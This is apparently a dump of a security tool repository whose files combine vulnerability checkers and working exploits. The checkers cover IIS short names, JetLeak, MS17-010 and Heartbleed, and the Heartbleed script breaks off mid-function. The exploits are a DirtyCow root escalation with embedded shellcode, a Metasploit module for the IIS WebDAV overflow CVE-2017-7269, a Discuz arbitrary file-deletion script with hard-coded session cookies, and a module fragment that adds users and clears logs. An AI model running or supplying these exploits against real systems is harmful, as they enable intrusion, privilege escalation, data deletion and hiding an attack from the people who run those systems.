"\x2c\x34\x37\x2c\x34\x38\x2c\x34\x39\x2c\x35\x30\x2c\x35\x31\x2c" + 213 | # "\x35\x32\x2c\x35\x33\x2c\x35\x34\x2c\x35\x35\x2c\x35\x36\x2c\x35" + 214 | # "\x37\x2c\x35\x38\x2c\x35\x39\x2c\x36\x30\x3a\x3a\x31" 215 | # 216 | # u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 217 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 218 | # u3 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 219 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 220 | # u4 = "\xa6\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + 221 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 222 | # u5 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00" + 223 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 224 | # userstring 225 | # sock.put(u1) 226 | # sock.get(1024) 227 | # sock.put(u1) 228 | # sock.get(1024) 229 | # sock.put(u2) 230 | # sock.get(1024) 231 | # sock.put(u3) 232 | # sock.get(1024) 233 | # sock.put(u2) 234 | # sock.get(1024) 235 | # sock.put(u3) 236 | # sock.get(1024) 237 | # sock.put(u4) 238 | # sock.get(1024) 239 | # sock.put(groups) 240 | # sock.get(1024) 241 | # sock.put(users) 242 | # sock.get(1024) 243 | # sock.put(u5) 244 | # sock.get(1024) 245 | # sock.put(u2) 246 | # sock.get(1024) 247 | # sock.put(u3) 248 | # sock.get(1024) 249 | # sock.put(u4) 250 | # sock.put(1024) 251 | # sock.put(groups) 252 | # sock.get(1024) 253 | # sock.put(users) 254 | # sock.put(1024) 255 | # print_good("ADDED USER!: user #{datastore['USERNAME']}'s password is #{datastore['PASSWORD']}") 256 | # 257 | # else 258 | end 259 | 260 | 261 | if (datastore['CLEAR_LOGS']) 262 | sock.put(clear_logs) 263 | sock.put(clear_logs2) 264 | print_good("LOGS CLEARED! 
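@ #{rhost}:#{rport}")
end
disconnect()
end
end

end
-------------------------------------------------------------------------------- /IIS_short_name_scanner.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
#encoding:utf-8
#IIS short_name scanner


import sys
import httplib
import urlparse
import threading
import Queue
import time


class Scanner():
    """Enumerate IIS 8.3 short names through tilde (~) wildcard requests.

    Detection relies on the status-code difference between a wildcard path
    that matches an existing short name (404) and one that cannot match
    anything (non-404); see is_vul() and _scan_worker().
    """

    def __init__(self, target):
        """Normalise *target* and start the background message printer.

        Args:
            target: base URL or bare host; ``http://`` is assumed when no
                scheme is given.
        """
        self.target = target.lower()
        if not self.target.startswith('http'):
            self.target = 'http://%s' % self.target
        # Parse the normalised URL, not the raw argument: parsing a bare host
        # without a scheme leaves netloc empty and no request ever reaches
        # the server.
        self.scheme, self.netloc, self.path, _, _, _ = \
            urlparse.urlparse(self.target)
        if self.path[-1:] != '/':  # ends with slash
            self.path += '/'
        self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()
        self.lock = threading.Lock()
        self.threads = []
        self.request_method = ''
        self.msg_queue = Queue.Queue()
        self.STOP_ME = False
        # Daemon thread: if is_vul() raises before STOP_ME is ever set, the
        # process no longer hangs on a printer loop that never terminates.
        self._printer = threading.Thread(target=self._print)
        self._printer.daemon = True
        self._printer.start()

    def _conn(self):
        """Return a new HTTP(S) connection to the target, or None on failure."""
        try:
            if self.scheme == 'https':
                conn = httplib.HTTPSConnection(self.netloc)
            else:
                conn = httplib.HTTPConnection(self.netloc)
            return conn
        except Exception, e:
            print '[_conn.Exception]', e
            return None

    def _get_status(self, path):
        """Issue one request for *path* and return the HTTP status code.

        Raises:
            Exception: wrapping any connection or protocol error.
        """
        conn = self._conn()
        if conn is None:
            raise Exception('[_get_status.Exception] could not create connection')
        try:
            conn.request(self.request_method, path)
            return conn.getresponse().status
        except Exception, e:
            raise Exception('[_get_status.Exception] %s' % str(e))
        finally:
            conn.close()  # release the socket even when the request fails

    def is_vul(self):
        """Return True when the server leaks short names via tilde wildcards.

        Tries GET then OPTIONS; the method that produced the 404 / non-404
        pair is left in self.request_method for the scan workers.

        Raises:
            Exception: wrapping any error from _get_status().
        """
        try:
            for _method in ['GET', 'OPTIONS']:
                self.request_method = _method
                status_1 = self._get_status(self.path + '/*~1*/a.aspx')  # an existing file/folder
                status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx')  # a non-existing file/folder
                if status_1 == 404 and status_2 != 404:
                    return True
            return False
        except Exception, e:
            raise Exception('[is_vul.Exception] %s' % str(e))

    def run(self):
        """Seed the work queue, run 20 workers to completion, then stop the printer."""
        for c in self.alphanum:
            self.queue.put((self.path + c, '.*'))  # filename, extension
        for _ in range(20):
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
        for t in self.threads:
            t.join()
        self.STOP_ME = True
        # Let the printer drain msg_queue before report() writes, so no
        # worker output is lost now that the printer is a daemon thread.
        self._printer.join()

    def report(self):
        """Print the directories and files collected by the workers."""
        print '-' * 64
        for d in self.dirs:
            print 'Dir: %s' % d
        for f in self.files:
            print 'File: %s' % f
        print '-' * 64
        print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))
        print 'Note that * is a wildcard, matches any character zero or more times.'

    def _print(self):
        """Printer thread body: echo queued messages until STOP_ME is set and the queue is empty."""
        while not self.STOP_ME or (not self.msg_queue.empty()):
            if self.msg_queue.empty():
                time.sleep(0.05)
            else:
                print self.msg_queue.get()

    def _scan_worker(self):
        """Worker thread body: pop (url, ext) pairs and expand every match.

        A 404 for ``<url>*~1<ext>/1.aspx`` means the prefix matches a short
        name; the name is extended one character at a time (first 6 chars
        only), then the extension is searched the same way. Results go to
        self.dirs / self.files; a worker exits once the queue stays empty
        for one second.
        """
        while True:
            try:
                url, ext = self.queue.get(timeout=1.0)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))

                    if len(url) - len(self.path) < 6:  # enum first 6 chars only
                        for c in self.alphanum:
                            self.queue.put((url + c, ext))
                    else:
                        if ext == '.*':
                            self.queue.put((url, ''))

                        if ext == '':
                            with self.lock:  # result lists are shared by 20 workers
                                self.dirs.append(url + '~1')
                            self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')

                        elif len(ext) == 5 or (not ext.endswith('*')):  # .asp*
                            with self.lock:
                                self.files.append(url + '~1' + ext)
                            self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')

                        else:
                            for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                self.queue.put((url, ext[:-1] + c + '*'))
                                if len(ext) < 4:  # < len('.as*')
                                    self.queue.put((url, ext[:-1] + c))

            except Queue.Empty, e:
                break
            except Exception, e:
                print '[Exception]', e


if __name__ == '__main__':
    if len(sys.argv) == 1:
        # Usage text names this file (the old text pointed at a different script name).
        print 'Usage: python IIS_short_name_scanner.py http://www.target.com/'
        sys.exit()

    target = sys.argv[1]
    s = Scanner(target)
    if not s.is_vul():
        s.STOP_ME = True
        print 'Server is not vulnerable'
        sys.exit(0)

    print 'Server is vulnerable, please wait, scanning...'
    s.run()
    s.report()
-------------------------------------------------------------------------------- /Jetleak-Testing-Script/README.md: --------------------------------------------------------------------------------
# Jetleak Testing Script
### Jetty web server 远程共享缓冲区泄漏 [CVE-2015-2080]

This tool is intended to provide a quick-and-dirty way for organizations to test whether their Jetty web server versions are vulnerable to JetLeak. Currently, this script does not handle sites with invalid SSL certs. This will be fixed in a future iteration.

For additional details on the Jetleak vulnerability refer to our blog post: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html

Sample Usage: python jetleak_tester.py [url] [port]

Sample Output for a server that is not vulnerable:

$ python jetleak_tester.py http://[ENTER HOSTNAME] 80

This version of Jetty is NOT vulnerable to JetLeak.
Sample Output for a server that is vulnerable:

$ python jetleak_tester.py http://[ENTER HOSTNAME] 80

This version of Jetty is VULNERABLE to JetLeak!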
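-------------------------------------------------------------------------------- /Jetleak-Testing-Script/jetleak_exp.py: --------------------------------------------------------------------------------
import httplib, urllib
conn = httplib.HTTPConnection("127.0.0.1:8080")
headers = {"Referer": chr(0)*44}
conn.request("POST", "/test-spec/test", "", headers)
r1 = conn.getresponse()
print r1.status, r1.reason
-------------------------------------------------------------------------------- /Jetleak-Testing-Script/jetleak_tester.py: --------------------------------------------------------------------------------
import httplib, urllib, ssl, string, sys, getopt, socket
from urlparse import urlparse

'''
Author: Gotham Digital Science
Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether
         their Jetty web server versions are vulnerable to JetLeak. Currently, this script does
         not handle sites with invalid SSL certs. This will be fixed in a future iteration.
'''

if len(sys.argv) < 3:
    print("Usage: jetleak.py [url] [port]")
    sys.exit(1)

url = urlparse(sys.argv[1])
# hostname is None for inputs such as "http://" or a bare word without a
# scheme, both of which the old netloc check let through.
if url.scheme == '' or url.hostname is None:
    print("Error: Invalid URL Entered.")
    sys.exit(1)

# The port is taken from the command line; reject non-numeric or
# out-of-range values instead of letting httplib fail obscurely later.
try:
    port = int(sys.argv[2])
except ValueError:
    print("Error: Port must be an integer.")
    sys.exit(1)
if not 0 < port < 65536:
    print("Error: Port must be between 1 and 65535.")
    sys.exit(1)

conn = None

# url.hostname (not netloc) so a "host:port" URL does not end up as
# "host:port:port"; the explicit port argument is authoritative.
if url.scheme == "https":
    conn = httplib.HTTPSConnection(url.hostname, port, timeout=10)
elif url.scheme == "http":
    conn = httplib.HTTPConnection(url.hostname, port, timeout=10)
else:
    print("Error: Only 'http' or 'https' URL Schemes Supported")
    sys.exit(1)

x = "\x00"
headers = {"Referer": x}
try:
    conn.request("POST", "/", "", headers)
    r1 = conn.getresponse()
except (socket.error, httplib.HTTPException) as e:
    print("Error: Could not complete request to %s:%d (%s)" % (url.hostname, port, e))
    sys.exit(1)
finally:
    conn.close()  # status and reason are already read; do not leak the socket

if (r1.status == 400 and ("Illegal character 0x0 in state" in r1.reason)):
    print("\r\nThis version of Jetty is VULNERABLE to JetLeak!")
else:
    print("\r\nThis version of Jetty is NOT vulnerable to JetLeak.")
-------------------------------------------------------------------------------- /MS17-010/ms17-010.php: --------------------------------------------------------------------------------
[+] Vulnerability!';
}else{
echo '[-] No Vulnerability!';
}
echo '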
[+] OS: '.smbos($host,445)."
"; 15 | } 16 | function ms17010($host,$port){ 17 | $tcp='tcp://'.$host.':'.$port; 18 | $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT); 19 | if ($sock){ 20 | $data1=pack('H*','00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200'); 21 | fwrite($sock,$data1); 22 | fread($sock, 1024); 23 | $data2=pack('H*','00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000'); 24 | fwrite($sock,$data2); 25 | $data2_data=fread($sock, 1024); 26 | $user_id=substr(bin2hex($data2_data),64,4); 27 | $data3=pack('H*','000000'.dechex(58+strlen($host)).'ff534d42750000000018012000000000000000000000000000002f4b'.$user_id.'c55e04ff000000000001001a00005c5c'.bin2hex($host).'5c49504324003f3f3f3f3f00'); 28 | fwrite($sock,$data3); 29 | $data3_data=fread($sock, 1024); 30 | $allid=substr(bin2hex($data3_data),28*2,16); 31 | $data4=pack('H*','0000004aff534d422500000000180128000000000000000000000000'.$allid.'1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00'); 32 | fwrite($sock,$data4); 33 | $data4_data=fread($sock, 1024); 34 | if(substr(bin2hex($data4_data),18,8) == '050200c0'){ 35 | return true; 36 | }else{ 37 | return false; 38 | } 39 | } 40 | } 41 | function smbos($host,$port){ 42 | $tcp='tcp://'.$host.':'.$port; 43 | $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT); 44 | if ($sock){ 45 | $payload1=pack('H*','00000085ff534d4272000000001853c80000000000000000000000000000fffe00000000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200'); 46 | 
$payload2=pack('H*','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'); 47 | fwrite($sock,$payload1); 48 | $out1=fread($sock, 1024); 49 | fwrite($sock,$payload2); 50 | $out2=fread($sock, 1024); 51 | $blob_len_arr=unpack('s',substr($out2,36+7,2)); 52 | $osarr=explode(chr(0),iconv('UTF-16LE','UTF-8',substr($out2,36+11+$blob_len_arr[1]))); 53 | return $osarr[0].'|'.$osarr[1]; 54 | } 55 | } 56 | ?> 57 | -------------------------------------------------------------------------------- /MS17-010/ms17-010.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import binascii 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "SMB远程溢出", 9 | "info": "MS17-010(NSA Eternalblue SMB),攻击者可通过此漏洞执行任意代码,进而导致服务器被入侵控制。", 10 | "level": "紧急", 11 | "type": "远程溢出", 12 | "author": "wolf@YSRC", 13 | "url": "http://bobao.360.cn/learning/detail/3738.html", 14 | "keyword": "server:smb", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | def check(ip, port, timeout): 20 | negotiate_protocol_request = binascii.unhexlify( 21 | "00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200") 22 | session_setup_request = binascii.unhexlify( 23 | "00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") 24 | try: 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | s.settimeout(timeout) 27 | s.connect((ip, port)) 28 | s.send(negotiate_protocol_request) 29 | s.recv(1024) 30 | s.send(session_setup_request) 31 | data = s.recv(1024) 32 | user_id = data[32:34] 33 | tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff000000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % ((58 + 
len(ip)), user_id.encode('hex'), ip.encode('hex')) 34 | s.send(binascii.unhexlify(tree_connect_andx_request)) 35 | data = s.recv(1024) 36 | allid = data[28:36] 37 | payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00" % allid.encode('hex') 38 | s.send(binascii.unhexlify(payload)) 39 | data = s.recv(1024) 40 | s.close() 41 | if "\x05\x02\x00\xc0" in data: 42 | return u"存在SMB远程溢出漏洞" 43 | s.close() 44 | except: 45 | pass 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Some Tools and Env. 2 | -------------------------------------------------------------------------------- /c0w.c: -------------------------------------------------------------------------------- 1 | /* 2 | * A PTRACE_POKEDATA variant of CVE-2016-5195 3 | * should work on RHEL 5 & 6 4 | * 5 | * (un)comment correct payload (x86 or x64)! 6 | * $ gcc -pthread c0w.c -o c0w 7 | * $ ./c0w 8 | * DirtyCow root privilege escalation 9 | * Backing up /usr/bin/passwd.. 
to /tmp/bak 10 | * mmap fa65a000 11 | * madvise 0 12 | * ptrace 0 13 | * $ /usr/bin/passwd 14 | * [root@server foo]# whoami 15 | * root 16 | * [root@server foo]# id 17 | * uid=0(root) gid=501(foo) groups=501(foo) 18 | * @KrE80r 19 | */ 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | int f; 33 | void *map; 34 | pid_t pid; 35 | pthread_t pth; 36 | struct stat st; 37 | 38 | // change if no permissions to read 39 | char suid_binary[] = "/usr/bin/passwd"; 40 | 41 | /* 42 | * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 43 | */ 44 | unsigned char shell_code[] = { 45 | 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 46 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 47 | 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 48 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 49 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 51 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 52 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 53 | 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00, 54 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 55 | 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 56 | 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 57 | 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 58 | 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 59 | 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 60 | }; 61 | unsigned int sc_len = 177; 62 | 63 | /* 64 | * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 65 | 
unsigned char shell_code[] = { 66 | 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 68 | 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 70 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 72 | 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 73 | 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 74 | 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 75 | 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 76 | 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 77 | 0x89, 0xe1, 0xcd, 0x80 78 | }; 79 | unsigned int sc_len = 136; 80 | */ 81 | 82 | void *madviseThread(void *arg) { 83 | int i,c=0; 84 | for(i=0;i<200000000;i++) 85 | c+=madvise(map,100,MADV_DONTNEED); 86 | printf("madvise %d\n\n",c); 87 | } 88 | 89 | 90 | int main(int argc,char *argv[]){ 91 | 92 | printf(" \n\ 93 | (___) \n\ 94 | (o o)_____/ \n\ 95 | @@ ` \\ \n\ 96 | \\ ____, /%s \n\ 97 | // // \n\ 98 | ^^ ^^ \n\ 99 | ", suid_binary); 100 | char *backup; 101 | printf("DirtyCow root privilege escalation\n"); 102 | printf("Backing up %s to /tmp/bak\n", suid_binary); 103 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); 104 | system(backup); 105 | 106 | f=open(suid_binary,O_RDONLY); 107 | fstat(f,&st); 108 | map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0); 109 | printf("mmap %x\n\n",map); 110 | pid=fork(); 111 | if(pid){ 112 | waitpid(pid,NULL,0); 113 | int u,i,o,c=0,l=sc_len; 114 | for(i=0;i<10000/l;i++) 115 | for(o=0;o 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 12 | 'Description' => %q{ 13 | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV 
service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: [ 'Dominic Chell ' ], 17 | 'License' => MSF_LICENSE, 18 | 'References' => 19 | [ 20 | [ 'CVE', 'CVE-2017-7269'], 21 | [ 'BID', '97127'], 22 | [ 'URL', 'https://github.com/edwardz246003/IIS_exploit'], 23 | ], 24 | 'Privileged' => false, 25 | 'Payload' => 26 | { 27 | 'Space' => 2000, 28 | 'BadChars' => "\x00", 29 | 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 30 | 'DisableNops' => 'True', 31 | 'EncoderOptions' => 32 | { 33 | 'BufferRegister' => 'ESI', 34 | } 35 | }, 36 | 'DefaultOptions' => 37 | { 38 | 'EXITFUNC' => 'process', 39 | 'PrependMigrate' => true, 40 | 'PrependMigrateProc' => "calc" 41 | }, 42 | 'Targets' => 43 | [ 44 | [ 45 | 'Microsoft Windows Server 2003 R2', 46 | { 47 | 'Platform' => 'win', 48 | }, 49 | ], 50 | ], 51 | 'Platform' => 'win', 52 | 'DisclosureDate' => 'March 26 2017', 53 | 'DefaultTarget' => 0)) 54 | 55 | register_options( 56 | [ 57 | Opt::RPORT(80) 58 | ], self.class) 59 | end 60 | 61 | def exploit 62 | connect 63 | 64 | buf1 = "If: " 67 | buf1 << " (Not ) \r\n\r\n") 73 | 74 | handler 75 | disconnect 76 | end 77 | 78 | end 79 | -------------------------------------------------------------------------------- /cve-2017-7269/readme.md: -------------------------------------------------------------------------------- 1 | ### cve-2017-7269 IIS WebDAV远程代码执行漏洞 2 | -------------------------------------------------------------------------------- /discuz_file_delete/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import requests 4 | import re 5 | import urllib2 6 | 7 | def get_cookie(): 8 | cookies={} 9 | for line in raw_cookies.split(';'): 10 | key,value=line.split('=',1) 11 | cookies[key]=value 12 | return cookies 13 | def get_formhash(url): 14 | 
cookies=get_cookie() 15 | testurl=url+"/home.php?mod=spacecp" 16 | s=requests.get(testurl,cookies=cookies) 17 | com = re.compile('') 18 | result = com.findall(s.text) 19 | return result[0] 20 | def del_step1(url,filename): 21 | headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} 22 | geturl=url+"/home.php?mod=spacecp&ac=profile&op=base" 23 | formhash=get_formhash(url) 24 | payload ={'birthprovince':filename,"profilesubmit":1,"formhash":formhash} 25 | cookies=get_cookie() 26 | r = requests.post(geturl,data=payload,headers=headers,cookies=cookies) 27 | if r.content.find('parent.show_success')>0: 28 | print 'Step1 success!!!' 29 | def del_step2(url): 30 | geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" 31 | heads={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} 32 | formhash=get_formhash(url) 33 | files ={'formhash':(None,formhash),'birthprovince':('1.jpg',open('1.jpg','rb'),'image/jpeg'),'profilesubmit':(None,'1')} 34 | cookies=get_cookie() 35 | r=requests.post(geturl,files=files,headers=heads,cookies=cookies) 36 | if r.text.find('parent.show_success')>0: 37 | print 'Step2 success!!!' 
38 | 39 | if __name__ == '__main__': 40 | #需要修改以下三个参数: 41 | #1、设置cookie 42 | raw_cookies="KDLk_2132_saltkey=N8K92IN8; KDLk_2132_lastvisit=1529041942; KDLk_2132_sid=Nk02TO; KDLk_2132_seccode=4.c9962205b642fb914f; KDLk_2132_ulastactivity=d414n%2BRa7lVl%2Fn%2F06lqRciP3sBxmjiYq4BZK9WstbOt0XHe%2BpNPU; KDLk_2132_auth=9df5iTEVucXV60BPWGm2guEhgozOakCOU1ZpISmlzFKPsEYuqdXv%2BCADzXQ6cY%2F6GXRJ1RIpf7PXdKDcKDPZ; KDLk_2132_lastcheckfeed=2%7C1529045562; KDLk_2132_lip=60.12.13.74%2C1529045518; KDLk_2132_nofavfid=1; KDLk_2132_lastact=1529046182%09misc.php%09patch; 8rWP_2132_saltkey=TwcSBIsp; 8rWP_2132_lastvisit=1529044715; 8rWP_2132_sid=CBef9F; 8rWP_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile; 8rWP_2132_lastact=1529050441%09misc.php%09seccode; 8rWP_2132_seccode=6.eb6a6cb2aa6d9068f2; zj4O_2132_saltkey=PgV54Iy8; zj4O_2132_lastvisit=1529049430; zj4O_2132_sid=l5GBCN; zj4O_2132_sendmail=1; zj4O_2132_seccode=1.cbaedf401bf4e1a08f; zj4O_2132_ulastactivity=d2a6fgylrUysBI0%2BXJc3lQK%2BxwKHgOjReqeibkUpAOk0LIlMf%2BfR; zj4O_2132_auth=d2ffPCW%2BNiwwFlDDtdNH3VL1T%2FO%2FUDo1sndn9lg0NwiBH0Ko5EmzsAuCokoAfu6v5jAj8soDdq2ee48NSWcS; zj4O_2132_noticeTitle=1; zj4O_2132_lastact=1529053101%09home.php%09spacecp; zj4O_2132_checkpm=1" 43 | #2、设置删除的文件 44 | filename="../../../data/install.lock" 45 | #3、设置url 46 | url="http://127.0.0.1" 47 | del_step1(url,filename) 48 | del_step2(url) 49 | -------------------------------------------------------------------------------- /discuz_file_delete/readme.md: -------------------------------------------------------------------------------- 1 | ### Discuz!X≤3.4 任意文件删除漏洞 2 | -------------------------------------------------------------------------------- /heartbleedtest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) 4 | # The author disclaims copyright to this source code. 
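import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    """Decode a whitespace-separated hex dump into a raw byte string."""
    return x.replace(' ', '').replace('\n', '').decode('hex')

# TLS ClientHello (record type 0x16, version 0x0302) advertising the cipher
# suites and extensions below; the trailing 00 0f 00 01 01 is the heartbeat
# extension that the server must accept for the test to mean anything.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat record (type 0x18) whose declared payload length (0x4000) is far
# larger than the bytes actually carried: this is the malformed request.
# A server that echoes more than 3 bytes back is over-reading its buffer.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    """Print *s* as 16-byte rows: offset, hex bytes, printable-ASCII column."""
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s* within *timeout* seconds.

    Returns the bytes read, or None on timeout or when the peer closes the
    connection before *length* bytes arrived.
    """
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        # Wait only as long as the overall deadline allows; the old code
        # passed a fixed 5 s here, so *timeout* was effectively ignored.
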